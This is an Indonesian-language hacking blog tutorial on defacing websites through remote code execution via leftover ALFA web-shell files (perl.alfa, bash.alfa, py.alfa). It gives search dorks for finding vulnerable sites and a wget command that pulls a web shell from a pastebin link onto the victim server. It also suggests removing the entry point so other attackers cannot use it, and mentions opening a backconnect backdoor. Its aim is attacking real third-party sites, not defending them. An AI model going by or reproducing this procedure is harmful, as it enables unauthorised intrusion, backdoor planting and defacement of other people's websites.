Cara Deface Remote Code Execution (RCE) Dengan Perl Alfa
Tutorial Deface Remote Code Execution Perl Alfa. Sudah terlalu lama bagi admin tidak membahas tentang Exploit yang ada di jaman sekarang kali ini saya akan membagikan salah satu exploit yang saya rasa simple namun sangat efektif, dan untuk menemukan bug ini juga mudah, hanya memanfaatkan sebuah file perl.alfa, bash.alfa, py.alfa yang biasanya tidak terhapus, di folder alfacgiapi.

Sebelum beranjak ke Tutorial Cara Deface Remote Code Execution (RCE) alangkah baiknya kita tahu dulu Tentang Remote Code Execution (RCE):

Remote Code Execution (RCE) ialah serangan yang memungkinkan penyerang menjalankan kode berbahaya dari jarak jauh pada sistem yang rentan. Serangan ini memanfaatkan celah keamanan yang memungkinkan penyerang mengirimkan dan menjalankan kode arbitrer melalui jaringan, yang dapat membahayakan integritas dan kerahasiaan sistem yang terkena dampaknya. 

Cara Deface Remote Code Execution (RCE) dengan Perl.alfa

Untuk mencari celah keamanan yang ada, kalian bisa melakukan dorking dengan Dork:
- intitle:index of ALFA_DATA
- intitle:index of perl.alfa
- intitle:index of alfacgiapi
- perl alfa index of
- intext:"alfacgiapi"
- intext:"perl.alfa"

Kalian bisa kembangin lagi, bahkan admin sudah membagikan tutorialnya di artikel sebelumnya. 

Disini saya sudah memiliki salah satu target yang VULN terhadap bug RCE ini, untuk mengetahuinya sebenarnya cukup mudah, apabila kalian mengakses file perl.alfa atau bash.alfa, py.alfa itu akan BLANK, kemungkinan besar kita bisa melakukan RCE. 

Sebenarnya meskipun pada saat kita mengakses file perl.alfa ini blank, belum tentu command kita bsa ter-eksekusi, maka kita memanfaat kan tools dari exploit99.my.id


Dan untuk menggunakannya cukup mudah, kalian tinggal masukan situs yang blank tadi, misalnya vulnweb.com/ALFA_DATA/alfacgiapi/perl.alfa

Dan untuk command nya bsa dengan Perintah
ls
(singkatan dari "list") digunakan untuk menampilkan daftar file dan direktori di dalam sebuah direktori. dan apabila commandnya ter-eksekusi maka artinya kalian bsa melakukan RCE di web ini. 

Namun sebaliknya, jika tidak menampilkan apapun, atau error maka kalian pergi dan cari target lain.


jika kalian sudah menemukan website yang vuln, maka langkah selanjutnya kalian bisa menjalankan perintah
wget https://pastebin.com/raw/5R5pS3AC -O namashell.php
. kalian bisa sesuaikan sendiri dengan shell kalian. 


Jika sudah ter-eksekusi, maka kalian tinggal cek apakah terupload atau tidak, dengan command atau perintah ls tadi. Dan Boom shell berhasil terupload dengan sukses. 

Kalian tinggal mengakses shell tersebut di folder yang sama di folder perl.alfa tadi. Itulah caranya melakukan Remote Code Execution (RCE) dengan file perl.alfa atau bash.alfa, py.alfa. apabila shell kalian sudah terupload, jangan lupa untuk hapus atau patch folder tersebut agar tidak tertikung hehe ~, selanjutnya kalian bisa juga melakukan backconnect dengan shell backdoor.